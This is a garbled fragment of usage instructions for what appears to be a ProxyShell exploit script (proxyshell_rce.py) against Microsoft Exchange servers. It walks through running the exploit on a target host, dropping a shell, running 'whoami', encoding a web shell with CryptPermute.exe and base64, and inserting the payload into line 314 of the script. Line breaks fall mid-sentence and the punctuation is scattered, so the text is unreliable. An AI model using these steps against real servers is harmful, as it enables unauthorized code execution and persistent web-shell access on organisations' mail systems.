python3 proxyshell_rce.py -u ip|domain -e [email protected]
dropshell
whoami
- execute
CryptPermute.exe shell.txt
, generate filepoc
. - base64
poc
file. - Replace the contents of line 314 of the
proxyshell_rce.py
file:
<t:Content>base64 `poc` file string</t:Content>